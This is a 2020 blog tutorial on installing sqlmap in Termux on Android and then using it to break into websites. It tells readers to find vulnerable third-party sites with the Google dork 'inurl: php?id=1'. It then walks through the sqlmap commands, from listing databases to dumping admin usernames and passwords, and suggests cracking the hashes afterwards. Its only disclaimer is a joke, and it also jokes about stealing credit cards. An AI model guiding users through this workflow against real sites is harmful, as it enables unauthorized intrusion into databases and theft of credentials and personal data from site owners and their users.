Breaking News

Monday 14 September 2020

How to install and use SQLMAP in Termux

 

How to install and use SQLMAP in Termux


In this article, I am going to show you how to install and use SQLMAP in Termux. First of all, SQLMAP is an open-source tool that automatically detects and exploits SQL injection bug. By doing a SQL injection attack, an attacker can take over and manipulate a database on a server.

So from that, we can steal or retrieve a database from a website that we want For example, we can retrieve website admin id and password from the database.

And if you are lucky, you can get a CC (Credit Card/credit card) for those who like carding, can dump cc here just joking ok. Don't do any illegal activity with SQLMAP.😂😂

Ok now let's get started

Things needed:
  • An android device with android version 5.0 or up.
  • Termux application: Download.
  • Good internet connection.
If you downloaded the Termux launch the Termux app.

First We are going to update the package list with the command:

apt update

Now we have to install Python with the following command:

apt install python python2

Wait until python is installed. After installing python we will install git. Git will help you to clone the package.

apt install git

After installing git we are going to clone the SQLMAP package into our directory with the help of git command.


Wait for the process to be finished. As process finished now we need to enter the tool directory with the following command.

cd sqlmap

Now we need to give the permission of read-write and execute to the SQLMAP python file by using the command:

chmod +x sqlmap.py

After that, you need to run the following command in order to run the SQLMAP

python2 sqlmap.py

Now SQLMAP is successfully installed on your Termux. 

If you want to run SQLMAP again next time then you need to launch the Termux then you need to enter the directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.

Now let's see how to hack the website using SQLMAP

First, let me tell you. You can hack the websites that have SQL injection vulnerability.

Now you might be thinking about how to find a website that has SQL injection vulnerability. 

You can use google dorks in order to find out SQL injection vulnerability in the website.

Most of the website have SQL injection vulnerability start with php?id=1 or any kind of value which is present after php?id=

To find the vulnerable websites you can use this google dork inurl: php?id=1 or any value after php?id=

You can find more information about Google dorks here: Google hacking

Type the following command:

This command will help you to find out the database of the website

python2 sqlmap.py -u <your website> --dbs

If the website is vulnerable then you will found the output similar to this:

*Information_schema
*Database

Now our next step is to find tables that are present in the database with the following command

python2 sqlmap.py -u <your website> –D Database –tables

The above command tells Sqlmap to find out tables that are present under the database.

Note: You will see information schema don't waste your time in finding credentials or any juicy information in that schema because information schema is of no use.

After running the above command you will see tables something like this.

*id
*users
*admin

Now our next step is to find columns under the table admin.

python2 sqlmap.py -u <your website> -D Database -T admin --columns

The above command tells Sqlmap to find out columns under the table admin.

Now let's move on to our final command.

For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.

python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump

The above command will save the username and password in the text format in your device.

The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.

With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later

0 comments:

Post a Comment

'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();
'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();